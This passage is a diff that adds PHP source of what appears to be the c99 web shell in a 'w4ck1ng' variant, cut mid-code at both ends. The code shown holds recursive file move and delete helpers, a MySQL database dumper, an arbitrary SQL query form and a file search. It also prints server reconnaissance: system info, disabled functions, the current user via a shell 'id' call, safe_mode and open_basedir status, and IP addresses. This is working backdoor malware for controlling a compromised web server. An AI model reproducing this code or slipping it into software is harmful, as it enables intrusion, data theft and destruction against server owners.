DIRECTORY_SEPARATOR;} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) {return copy($d,$t);} + else {return FALSE;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + $ret = TRUE; + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) + { + if(copy($d,$t)) {return unlink($d);} + else {unlink($t); return FALSE;} + } + else {return FALSE;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); + return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); + if (is_dir($o)) + { + if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return FALSE;} +} +} +if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} +if (!function_exists("view_perms")) +{ +function view_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + + $owner["read"] = ($mode & 00400)?"r":"-"; + $owner["write"] = ($mode & 00200)?"w":"-"; + $owner["execute"] = ($mode & 00100)?"x":"-"; + $group["read"] = ($mode & 00040)?"r":"-"; + $group["write"] = ($mode & 00020)?"w":"-"; + $group["execute"] = ($mode & 00010)?"x":"-"; + $world["read"] = ($mode & 00004)?"r":"-"; + $world["write"] = ($mode & 00002)? "w":"-"; + $world["execute"] = ($mode & 00001)?"x":"-"; + + if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} + if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} + if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} + + return $type.join("",$owner).join("",$group).join("",$world); +} +} +if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} +if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} +if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} +if (!function_exists("parse_perms")) +{ +function parse_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$t = "s";} + elseif (($mode & 0x4000) === 0x4000) {$t = "d";} + elseif (($mode & 0xA000) === 0xA000) {$t = "l";} + elseif (($mode & 0x8000) === 0x8000) {$t = "-";} + elseif (($mode & 0x6000) === 0x6000) {$t = "b";} + elseif (($mode & 0x2000) === 0x2000) {$t = "c";} + elseif (($mode & 0x1000) === 0x1000) {$t = "p";} + else {$t = "?";} + $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; + $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; + $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; + return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); +} +} +if (!function_exists("parsesort")) +{ +function parsesort($sort) +{ + $one = intval($sort); + $second = substr($sort,-1); + if ($second != "d") {$second = "a";} + return array($one,$second); +} +} +if (!function_exists("view_perms_color")) +{ +function view_perms_color($o) +{ + if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";} + elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";} + else {return "<font color=green>".view_perms(fileperms($o))."</font>";} +} +} +if (!function_exists("mysql_dump")){ +function mysql_dump($set) +{ + global $shver; + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + $ret["err"] = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = 0;} + if (empty($add_drop)) {$add_drop = TRUE;} + if (empty($file)) + { + $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = TRUE;} + if (sizeof($tabs) == 0) + { + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + $out = "# Dumped by ".$shver." +# Home page: http://w4ck1ng.com +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." +# Date: ".date("d.m.Y H:i:s")." +# DB: \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + // recieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret["err"][] = mysql_smarterror();} + else + { + $row = mysql_fetch_row($res); + $out .= $row["1"].";\n\n"; + // recieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret["err"][] = 2;} + else + { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $out; +} +} +if (!function_exists("mysql_buildwhere")) +{ +function mysql_buildwhere($array,$sep=" and",$functs=array()) +{ + if (!is_array($array)) {$array = array();} + $result = ""; + foreach($array as $k=>$v) + { + $value = ""; + if (!empty($functs[$k])) {$value .= $functs[$k]."(";} + $value .= "'".addslashes($v)."'"; + if (!empty($functs[$k])) {$value .= ")";} + $result .= "`".$k."` = ".$value.$sep; + } + $result = substr($result,0,strlen($result)-strlen($sep)); + return $result; +} +} +if (!function_exists("mysql_fetch_all")) +{ +function mysql_fetch_all($query,$sock) +{ + if ($sock) {$result = mysql_query($query,$sock);} + else {$result = mysql_query($query);} + $array = array(); + while ($row = mysql_fetch_array($result)) {$array[] = $row;} + mysql_free_result($result); + return $array; +} +} +if (!function_exists("mysql_smarterror")) +{ +function mysql_smarterror($type,$sock) +{ + if ($sock) {$error = mysql_error($sock);} + else {$error = mysql_error();} + $error = htmlspecialchars($error); + return $error; +} +} +if (!function_exists("mysql_query_form")) +{ +function mysql_query_form() +{ + global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) + { + echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>"; + if ($tbl_struct) + { + echo "<td valign=\"top\"><b>Fields:</b><br>"; + foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "?<a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";} + echo "</td></tr></table>"; + } + } + if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} +} +} +if (!function_exists("mysql_create_db")) +{ +function mysql_create_db($db,$sock="") +{ + $sql = "CREATE DATABASE `".addslashes($db)."`;"; + if ($sock) {return mysql_query($sql,$sock);} + else {return mysql_query($sql);} +} +} +if (!function_exists("mysql_query_parse")) +{ +function mysql_query_parse($query) +{ + $query = trim($query); + $arr = explode (" ",$query); + /*array array() + { + "METHOD"=>array(output_type), + "METHOD1"... + ... + } + if output_type == 0, no output, + if output_type == 1, no output if no error + if output_type == 2, output without control-buttons + if output_type == 3, output with control-buttons + */ + $types = array( + "SELECT"=>array(3,1), + "SHOW"=>array(2,1), + "DELETE"=>array(1), + "DROP"=>array(1) + ); + $result = array(); + $op = strtoupper($arr[0]); + if (is_array($types[$op])) + { + $result["propertions"] = $types[$op]; + $result["query"] = $query; + if ($types[$op] == 2) + { + foreach($arr as $k=>$v) + { + if (strtoupper($v) == "LIMIT") + { + $result["limit"] = $arr[$k+1]; + $result["limit"] = explode(",",$result["limit"]); + if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} + unset($arr[$k],$arr[$k+1]); + } + } + } + } + else {return FALSE;} +} +} +if (!function_exists("c99fsearch")) +{ +function c99fsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $search_i_f; + global $search_i_d; + global $a; + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($f = readdir($h)) !== FALSE) + { + if($f != "." && $f != "..") + { + $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); + if (is_dir($d.$f)) + { + $search_i_d++; + if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} + if (!is_link($d.$f)) {c99fsearch($d.$f);} + } + else + { + $search_i_f++; + if ($bool) + { + if (!empty($a["text"])) + { + $r = @file_get_contents($d.$f); + if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} + if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} + if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} + else {$bool = strpos(" ".$r,$a["text"],1);} + if ($a["text_not"]) {$bool = !$bool;} + if ($bool) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($h); +} +} +if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} +//Sending headers +@ob_start(); +@ob_implicit_flush(0); +function onphpshutdown() +{ + global $gzipencode,$ft; + if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) + { + $v = @ob_get_contents(); + @ob_end_clean(); + @ob_start("ob_gzHandler"); + echo $v; + @ob_end_flush(); + } +} +function c99shexit() +{ + onphpshutdown(); + exit; +} +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", FALSE); +header("Pragma: no-cache"); +if (empty($tmpdir)) +{ + $tmpdir = ini_get("upload_tmp_dir"); + if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} +} +$tmpdir = realpath($tmpdir); +$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); +if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} +if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} +else {$tmpdir_logs = realpath($tmpdir_logs);} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = TRUE; + $hsafemode = "<font color=red>ON (secure)</font>"; +} +else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";} +else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";} +$sort = htmlspecialchars($sort); +if (empty($sort)) {$sort = $sort_default;} +$sort[1] = strtolower($sort[1]); +$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); +if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE)); +@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string",$highlight_string); //#DD0000 +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?> + +<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title>shell@<?php echo getenv("HTTP_HOST"); ?></title><STYLE> +TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;} +.style1 { + color: #FF0000; + font-weight: bold; +} +.style2 {font-size: -3} +</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><div align="center"><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"></p> + <p><font size="-3"><span class="style2"></br> + <font color="#333333">k1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1</font><font color="white">ngw4ck1n</font><font color="#333333">gw4c</font><font color="white">k</font><font color="#333333">1ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck</font><font color="white">1</font><font color="#333333">ngw4ck1ngw4ck1ng</font><font color="white">w4</font><font color="#333333">ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4ck1ngw</font><font color="white">4</font><font color="#333333">ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4c</font><font color="white">k1ng</font><font color="#333333">w4ck1ngw4ck1ngw4ck1ngw4ck1ng</font><br> + + <font color="#333333">w4ck1ngw4c</font><font color="white">k1n</font><font color="#333333">gw4ck</font><font color="white">1ngw4</font><font color="#333333">ck</font><font color="white">1ngw4ck1n</font><font color="#333333">gw</font><font color="white">4ck1n</font><font color="#333333">g</font><font color="white">w</font><font color="#333333">4ck1ngw4ck</font><font color="white">1ngw4</font><font color="#333333">ck</font><font color="white">1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1</font><font color="#333333">ngw4ck</font><font color="white">1n</font><font color="#333333">gw4ck1ngw</font><font color="white">4ck</font><font color="#333333">1ng</font><font color="white">w4ck</font><font color="#333333">1ngw4ck1ngw4ck1ngw4ck1ngw4ck</font><br> + + <font color="#333333">1ngw4ck1ng</font><font color="white">w4ck</font><font color="#333333">1ngw</font><font color="white">4ck1</font><font color="#333333">ngw4</font><font color="white">ck1</font><font color="#333333">ng</font><font color="white">w4c</font><font color="#333333">k1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1</font><font color="#333333">ngw</font><font color="white">4</font><font color="#333333">ck</font><font color="white">1ngw4ck1ng</font><font color="#333333">w</font><font color="white">4ck</font><font color="#333333">1ng</font><font color="white">w4ck1n</font><font color="#333333">gw4ck1ngw</font><font color="white">4ck</font><font color="#333333">1ngw4ck1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1ngw</font><font color="#333333">4ck1n</font><font color="white">gw4ck1ngw4ck</font><font color="#333333">1ngw4ck1ngw</font><br> + + <font color="#333333">4ck1ngw4ck1</font><font color="white">ngw4</font><font color="#333333">ck</font><font color="white">1ngw4</font><font color="#333333">ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw</font><font color="white">4ck1</font><font color="#333333">n</font><font color="white">gw4</font><font color="#333333">ck1</font><font color="white">ngw4ck</font><font color="#333333">1ngw4</font><font color="white">ck</font><font color="#333333">1</font><font color="white">ngw4ck1n</font><font color="#333333">gw4ck1ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck1ngw4</font><font color="white">ck1n</font><font color="#333333">g</font><font color="white">w4ck1ngw4ck</font><font color="#333333">1ngw4c</font><font color="white">k1ngw</font><font color="#333333">4ck1ngw4ck1</font><br> + + <font color="#333333">ngw4ck1ngw4c</font><font color="white">k1ngw4ck1ng</font><font color="#333333">w4</font><font color="white">ck1n</font><font color="#333333">gw4ck1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1ngw4ck1n</font><font color="#333333">gw4ck1n</font><font color="white">gw4ck1ngw4ck</font><font color="#333333">1ngw4ck1ng</font><font color="white">w4ck1</font><font color="#333333">ngw4ck1</font><font color="white">ngw4ck1ngw4ck1ng</font><font color="#333333">w4ck1ng</font><font color="white">w4ck1n</font><font color="#333333">gw4ck1ngw4</font><br> + + <font color="#333333">ck1ngw4ck1ng</font><font color="white">w4ck1ngw</font><font color="#333333">4c</font><font color="white">k1ngw4c</font><font color="#333333">k1ng</font><font color="white">w4ck1ngw4c</font><font color="#333333">k1n</font><font color="white">gw4c</font><font color="#333333">k1ngw4c</font><font color="white">k1ngw4ck1ngw4ck</font><font color="#333333">1ngw4c</font><font color="white">k1</font><font color="#333333">n</font><font color="white">gw4</font><font color="#333333">ck1ngw4</font><font color="white">ck1ngw4ck1ngw4ck1ngw4ck1ngw</font><font color="#333333">4ck1ngw4ck1n</font><br> + + <font color="#333333">gw4ck1ngw4ck1</font><font color="white">ngw4ck</font><font color="#333333">1ngw</font><font color="white">4ck1ng</font><font color="#333333">w4c</font><font color="white">k1ngw</font><font color="#333333">4</font><font color="white">ck1n</font><font color="#333333">gw4c</font><font color="white">k1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1ngw4ck1ngw4ck1</font><font color="#333333">ngw4ck</font><font color="white">1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4</font><font color="#333333">c</font><font color="white">k1ngw4</font><font color="#333333">ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw4</font><font color="white">ck1</font><font color="#333333">ngw4ck1ngw4c</font><br> + + <font color="#333333">k1ngw4ck1ngw4c</font><font color="white">k1ngw</font><font color="#333333">4ck1n</font><font color="white">gw4ck</font><font color="#333333">1ngw4ck1n</font><font color="white">gw4c</font><font color="#333333">k1ngw</font><font color="white">4ck1ngw4ck1n</font><font color="#333333">g</font><font color="white">w4ck1</font><font color="#333333">ngw4</font><font color="white">ck1ngw4ck</font><font color="#333333">1ngw</font><font color="white">4ck</font><font color="#333333">1ngw4c</font><font color="white">k1n</font><font color="#333333">gw</font><font color="white">4ck1</font><font color="#333333">ngw4ck1n</font><font color="white">g</font><font color="#333333">w4ck1n</font><font color="white">gw4c</font><font color="#333333">k1ngw4ck1ng</font><br> + + <font color="#333333">w4ck1ngw4ck1ngw4</font><font color="white">ck1</font><font color="#333333">ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck1ngw4</font><font color="white">ck1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1ngw</font><font color="#333333">4ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw4ck</font><font color="white">1ngw4ck1ngw4c</font><font color="#333333">k1n</font><font color="white">gw4</font><font color="#333333">ck1n</font><font color="white">gw4</font><font color="#333333">ck1ngw4ck1ngw</font><font color="white">4ck1ng</font><font color="#333333">w4ck1ngw4ck</font><br> + + <font color="#333333">1ngw4ck1ngw4ck1ngw4ck1ngw4</font><font color="white">c</font><font color="#333333">k1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1ngw4ck1ngw4ck1ngw4ck1n</font><font color="white">g</font><font color="#333333">w4ck1ngw4c</font><font color="white">k1ngw4</font><font color="#333333">c</font><font color="white">k</font><font color="#333333">1ngw4c</font><font color="white">k1n</font><font color="#333333">gw4c</font><font color="white">k1n</font><font color="#333333">gw4ck1ngw4ck1ngw</font><font color="white">4ck1n</font><font color="#333333">gw4ck1ngw</font><br> + + <font color="#333333">4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ng</font><font color="white">w4</font><font color="#333333">ck1ngw4ck1ngw4ck1n</font><font color="white">gw4ck</font><font color="#333333">1ngw4ck1</font><br> + <font color="#333333">ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4ck1ngw4ck1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1ngw4</font></br> + </span>&nbsp;</p></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>System Info:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><? echo "<b>Disabled functions</b>: <b>"; +if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} ?><p align="left"><b>We are: <?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?><?php $curl_on = @function_exists('curl_version'); +echo "<br/>cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>OFF</font>")); ?></br><? if(@ini_get("register_globals")){$reg_g="<font color=green>ON</font>";}else{$reg_g="<font color=red>OFF</font>";} echo("<b>Register globals:</b> $reg_g"); ?><?php echo "<br/>MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } +echo "</b>"; +echo "<br/>MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?><?php echo "<br/>PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?><?php echo "<br/>Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?> </b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php +$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); +if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} +$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); +if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} +$d = str_replace("\\\\","\\",$d); +$dispd = htmlspecialchars($d); +$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); +$i = 0; +foreach($pd as $b) +{ + $t = ""; + $j = 0; + foreach ($e as $r) + { + $t.= $r.DIRECTORY_SEPARATOR; + if ($j == $i) {break;} + $j++; + } + echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>"; + $i++; +} +echo "&nbsp;&nbsp;&nbsp;"; +if (is_writable($d)) +{ + $wd = TRUE; + $wdt = "<font color=green>[ ok ]</font>"; + echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>"; +} +else +{ + $wd = FALSE; + $wdt = "<font color=red>[ Read-Only ]</font>"; + echo "<b>".view_perms_color($d)."</b>"; +} +if (is_callable("disk_free_space")) +{ + $free = disk_free_space($d); + $total = disk_total_space($d); + if ($free === FALSE) {$free = 0;} + if ($total === FALSE) {$total = 0;} + if ($free < 0) {$free = 0;} + if ($total < 0) {$total = 0;} + $used = $total-$free; + $free_percent = round(100/($total/$free),2); + echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>"; + +} +echo "<br>"; +echo "<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>"; +$letters = ""; +if ($win) +{ + $v = explode("\\",$d); + $v = $v[0]; + foreach (range("a","z") as $letter) + { + $bool = $isdiskette = in_array($letter,$safemode_diskettes); + if (!$bool) {$bool = is_dir($letter.":\\");} + if ($bool) + { + $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ "; + if ($letter.":" != $v) {$letters .= $letter;} + else {$letters .= "<font color=green>".$letter."</font>";} + $letters .= " ]</a> "; + } + } + if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";} +} +if (count($quicklaunch) > 0) +{ + 